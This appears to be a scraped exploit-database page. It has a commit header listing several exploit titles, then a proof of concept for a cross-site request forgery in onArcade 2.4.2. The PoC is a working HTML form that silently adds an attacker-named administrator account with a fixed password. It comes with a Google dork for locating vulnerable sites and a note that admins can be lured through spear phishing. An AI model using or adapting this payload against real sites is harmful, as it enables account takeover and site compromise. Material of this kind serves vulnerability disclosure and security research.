9d8170fd85
9 changes to exploits/shellcodes TP-Link Wireless N Router WR840N - Denial of Service (PoC) Splinterware System Scheduler Pro 5.12 - Privilege Escalation iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow iSmartViewPro 1.5 - 'Account' Buffer Overflow OpenEMR < 5.0.1 - Remote Code Execution Kirby CMS 2.5.12 - Cross-Site Scripting osTicket 1.10.1 - Arbitrary File Upload LG-Ericsson iPECS NMS 30M - Directory Traversal LAMS < 3.1 - Cross-Site Scripting onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin) Monstra 3.0.4 - Cross-Site Scripting LAMS < 3.1 - Cross-Site Scripting onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin) Monstra 3.0.4 - Cross-Site Scripting
25 lines
No EOL
966 B
HTML
25 lines
No EOL
966 B
HTML
# Exploit Title: Cross-Site Request Forgery (Add Admin)
|
|
# Google Dork: Powered by onArcade v2.4.2
|
|
# Date: 2018/August/4
|
|
# Author: r3m0t3nu11[Zero-way]
|
|
# Software Link: ["http://www.onarcade.com"]
|
|
# Version: ["Uptodate"]
|
|
|
|
the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
|
|
|
|
|
|
|
|
[P0C]#
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="https://server/path/admin/members.php?a=add_member&ajax=1"method="POST">
|
|
<input type="hidden" name="username" value="r3m0t3nu11" />
|
|
<input type="hidden" name="email" value="l0v3rs14@gmail.com"/>
|
|
<input type="hidden" name="password" value="123123" />
|
|
<input type="hidden" name="user_group" value="2" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |